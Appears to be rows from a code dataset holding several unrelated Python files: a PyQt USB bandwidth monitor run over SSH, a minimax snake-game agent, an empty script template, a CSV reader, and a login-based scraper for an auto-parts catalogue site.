self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| from library import config, ini, lang, log, performance, periphery, queue
from asyncio import get_event_loop
from threading import Thread, Event
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import QTreeWidgetItem
# noinspection PyPep8Naming
class Signal(QObject):
""" PyQt signals for correct daemon device tree calls from a different thread """
addTopLevelItem_ = pyqtSignal(object)
setText_ = pyqtSignal(str, int, str)
setToolTip_ = pyqtSignal(str, int, object)
setIcon_ = pyqtSignal(str, int, object)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - emit the signal """
self.addTopLevelItem_.emit(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - emit the signal """
self.setText_.emit(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - emit the signal """
self.setToolTip_.emit(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - emit the signal """
self.setIcon_.emit(bid, col, icon)
# noinspection PyPep8Naming
class Tree(metaclass=config.Singleton):
""" Daemon device bandwidth tree """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._sw_config = ini.SWConfig(self._base)
self._lang = lang.Tree
self._signal = Signal()
self._signal.addTopLevelItem_.connect(lambda __daemon: self._addTopLevelItem(__daemon))
self._signal.setText_.connect(lambda __bid, __col, __baud: self._setText(__bid, __col, __baud))
self._signal.setToolTip_.connect(lambda __bid, __col, __html: self._setToolTip(__bid, __col, __html))
self._signal.setIcon_.connect(lambda __bid, __col, __icon: self._setIcon(__bid, __col, __icon))
def _getDaemon(self):
""" """
_root = self._base.dev_tree.invisibleRootItem()
for idx in range(_root.childCount()):
_daemon = _root.child(idx)
if _daemon.text(0) == self._ip_addr:
return _daemon, idx
return None, None
def _takeDaemon(self, idx):
""" """
return self._base.dev_tree.takeTopLevelItem(idx)
def _loadDaemon(self):
""" """
_daemon = QTreeWidgetItem([self._ip_addr])
self.addTopLevelItem(_daemon)
return _daemon, 0
def _getDevice(self, bid):
""" """
_daemon, _idx = self._getDaemon()
if not _daemon:
return None, None
for idx in range(_daemon.childCount()):
_dev = _daemon.child(idx)
if _dev.text(0) == bid:
return _daemon, _dev
return _daemon, None
def _addTopLevelItem(self, daemon):
""" Load daemon as a top-level item - inner function """
self._base.dev_tree.addTopLevelItem(daemon)
self._base.dev_tree.expandAll()
def _setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_baud = _dev.child(0)
_baud.setText(col, baud)
def _setToolTip(self, bid, col, html):
""" Set tooltip for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setToolTip(col, html)
def _setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation - inner function """
_daemon, _dev = self._getDevice(bid)
if _dev:
_dev.setIcon(col, icon)
def addTopLevelItem(self, daemon):
""" Load daemon as a top-level item from a different thread """
self._signal.addTopLevelItem(daemon)
def setText(self, bid, col, baud):
""" Set incoming/outgoing bandwidth from a different thread """
self._signal.setText(bid, col, baud)
def setToolTip(self, bid, col, html):
""" Set status tooltip for a daemon during capturing operation from a different thread """
self._signal.setToolTip(bid, col, html)
def setIcon(self, bid, col, icon):
""" Set status icon for a daemon during capturing operation from a different thread """
self._signal.setIcon(bid, col, icon)
def loadDevice(self, bid):
""" """
_device = QTreeWidgetItem([bid])
_daemon, _idx = self._getDaemon()
if not _daemon:
_daemon, _idx = self._loadDaemon()
_daemon, _dev = self._getDevice(bid)
if _dev:
return
_daemon = self._takeDaemon(_idx)
if self._sw_config.dev_perf:
_baud = QTreeWidgetItem([self._lang.ParamBaud, self._lang.ParamNA, self._lang.ParamNA])
_device.addChild(_baud)
_daemon.addChild(_device)
self.addTopLevelItem(_daemon)
def unloadDevice(self, bid):
""" """
_daemon, _dev = self._getDevice(bid)
if _dev:
_daemon.removeChild(_dev)
def setIncoming(self, bid, baud):
""" Set incoming bandwidth """
self.setText(bid, 1, baud)
def setOutgoing(self, bid, baud):
""" Set outgoing bandwidth """
self.setText(bid, 2, baud)
# noinspection PyPep8Naming
class USBTop(metaclass=config.Singleton):
""" Daemon device bandwidth processing """
def __init__(self, base, ip_addr):
self._base = base
self._ip_addr = ip_addr
self._loop = get_event_loop()
self._sw_config = ini.SWConfig(self._base)
self._manager = queue.Manager(self._base)
self._name_running = f'USBTOP processing running : {self._ip_addr}'
self._name_cancelling = f'USBTOP processing cancelling : {self._ip_addr}'
self._ssh = periphery.SSH(self._base, self._ip_addr)
self._log = log.Manager(self._base)
self._lang = lang.USBTop
self._tree = Tree(self._base, self._ip_addr)
self._dmn_perf = performance.Device(self._base)
self._thread = Thread()
self._event = Event()
self._pid = None
# noinspection PyMethodMayBeStatic
def _idx(self, row):
""" """
return [param for param in row.split() if param.isdigit()].pop()
def _processing(self, buf):
""" """
_bid = None
for row in buf:
if 'Bus ID' in row:
_bid = self._idx(row)
continue
if 'Device ID' in row:
_did = self._idx(row)
_value = row.split()
self._dmn_perf.setProcessing(self._ip_addr, _bid, _did, (_value[4], _value[6]))
def _exec(self):
""" Run the USBTOP processing - daemon thread """
_query = 'sudo usbtop'
_echo = self._ssh.exec(_query)
if not all(_echo):
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunQuery} : {_query}')
self._pid, _stdin, _stdout, _stderr = _echo
_buf = list()
while not self._event.is_set():
_line = _stdout.readline(2048)
if not _line:
return self._event.set()
if '\x1b[2J\x1b[1;1H' in _line:
self._processing(_buf)
_buf = list()
_buf.append(_line.strip().replace('\x1b[2J\x1b[1;1H', ''))
continue
_buf.append(_line.strip())
def __run(self):
""" Run the USBTOP processing - inner function """
self._event = Event()
self._thread = Thread(target=self._exec, name=self._name_running)
self._thread.start()
self._log.setSuccess(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.RunSuccess}')
self._event.wait()
return self._event.is_set()
async def _run(self):
""" Run the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeRun}')
if not await self._ssh.establish(self._lang.LogSeparator):
return self._log.setInformation(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
await self._loop.run_in_executor(None, self.__run)
if self.isRunning():
self.cancel()
async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive() | en | 0.766665 | # noinspection PyPep8Naming PyQt signals for correct daemon device tree calls from a different thread Load daemon as a top-level item - emit the signal Set incoming/outgoing bandwidth - emit the signal Set tooltip for a daemon during capturing operation - emit the signal Set status icon for a daemon during capturing operation - emit the signal # noinspection PyPep8Naming Daemon device bandwidth tree Load daemon as a top-level item - inner function Set incoming/outgoing bandwidth - inner function Set tooltip for a daemon during capturing operation - inner function Set status icon for a daemon during capturing operation - inner function Load daemon as a top-level item from a different thread Set incoming/outgoing bandwidth from a different thread Set status tooltip for a daemon during capturing operation from a different thread Set status icon for a daemon during capturing operation from a different thread Set incoming bandwidth Set outgoing bandwidth # noinspection PyPep8Naming Daemon device bandwidth processing # noinspection PyMethodMayBeStatic Run the USBTOP processing - daemon thread Run the USBTOP processing - inner function Run the USBTOP processing - coroutine Cancel the USBTOP processing - coroutine Run the USBTOP processing - calling coroutine Cancel the USBTOP processing - calling coroutine Check if the USBTOP processing is running | 2.424398 | 2 |
agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 1 | 10357 | <reponame>youkeyao/SJTU-CS410-Snakes-3V3-Group06
DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
def go(state, action, board_height, board_width):
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
def go(state, action, board_height, board_width):
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | none | 1 | 3.439826 | 3 |
|
public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 0 | 10358 | <reponame>Asher-Simcha/help<filename>public_html/python/Empty_Python_Page.py
#!/usr/bin/pyton
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
| #!/usr/bin/pyton
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF | en | 0.564956 | #!/usr/bin/pyton # Title: # Author: # Additional Authors: # Filename: # Description: # Version: # Date: # Last Modified: # Location_of_the_Video: # Meta_data_for_YouTube: # Web_Site_For_Video: # Start Your Code Here #EOF | 1.822273 | 2 |
Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 0 | 10359 | <gh_stars>0
def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0]
| def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0] | none | 1 | 3.108223 | 3 |
|
semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 0 | 10360 | <reponame>no1sebomb/University-Labs
# coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
return self.response_brand(1, "Артикул не знайдено")
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
return self.response_brand(1, "Бренд не знайдено")
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
return self.response_brand(3, "Помилка авторизації")
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
login_request = self.session.post(self.Link.login, data={"login": self.username, "password": <PASSWORD>},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0
| # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
return self.response_brand(1, "Артикул не знайдено")
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
return self.response_brand(1, "Бренд не знайдено")
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
